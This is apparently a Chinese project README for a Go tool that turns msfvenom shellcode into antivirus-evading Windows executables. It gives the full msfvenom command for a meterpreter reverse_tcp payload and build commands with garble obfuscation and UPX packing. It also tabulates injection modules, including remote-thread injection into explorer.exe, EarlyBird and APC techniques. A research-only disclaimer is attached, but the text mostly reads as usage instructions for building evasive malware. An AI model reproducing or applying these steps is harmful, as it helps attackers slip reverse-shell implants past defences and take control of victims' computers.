免责声明
该工具仅用于安全研究,禁止使用工具发起非法攻击等违法行为,造成的后果使用者负责
项目地址
介绍
GolangWindows
不确定免杀效果如何,核心部分借鉴大佬的代码然后自己造轮子
准备工作
kalimsfvenompayload-f c
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=ip lport=port -f c
shellcodeshellcode.txt
(无需过多处理,内部会对ShellCode进行编码)
生成免杀马
在生成免杀马之前请注意以下三件事
Golanggogo env -w GO111MODULE=ongo mod downloadgo env -w GOPROXY=https://mirrors.aliyun.com/goproxy
一切就绪后就可以开始生成了
示例:
CreateThreadgo run main.go -m CreateThread -dgarblego run main.go -m CreateThread -d -gupxgo run main.go -m CreateThread -d -g -u
可选参数如下
参数 | 参数说明 | 参数类型 | 是否必须 |
---|---|---|---|
-m | 使用模块 | string | 是 |
-s | shellcode文件(默认shellcode.txt) | string | 否 |
-d | 使用ldflags -s -w进行编译 | bool | 否 |
-r | 使用竞态检测器-race进行编译(可能提高免杀效果) | bool | 否 |
-w | 隐藏窗口ldflags -H windowsgui(可能降低免杀效果) | bool | 否 |
-u | 最终生成的exe进行UPX加壳 | bool | 否 |
-g | 使用garble进行编译(对源码进行混淆) | bool | 否 |
-h | 查看帮助信息 | bool | 否 |
其中必须的模块参数如下
模块名 | 简介 |
---|---|
CreateFiber | 利用Windows CreateFiber函数 |
CreateProcess | 利用Windows CreateProcess函数在挂起状态下创建进程 |
CreateRemoteThread | 远程进程注入ShellCode(注入explorer.exe) |
CreateRemoteThreadNative | 和上一条区别在于使用更底层的方式(注入explorer.exe) |
CreateThread | 利用Windows CreateThread函数 |
CreateThreadNative | 和上一条区别在于使用更底层的方式 |
CryptProtectMemory | 利用Windows dpapi.h CryptProtectMemory函数 |
CryptUnprotectMemory | 利用Windows dpapi.h CryptUnprotectMemory函数 |
EarlyBird | 注入的代码在进程主线程的入口点之前运行 |
EtwpCreateEtwThread | 利用Windows EtwpCreateEtwThread函数在进程中执行ShellCode |
HeapAlloc | 创建一个可供调用进程使用的堆并分配内存写入ShellCode |
NtQueueApcThreadEx | 在当前进程的当前线程中创建一个特殊用户APC来执行ShellCode |
RtlCreateUserThread | 利用Windows RtlCreateUserThread函数(注入explorer.exe) |
UuidFromStringA | 利用Windows UuidFromStringA函数 |
参考
Safe6Sec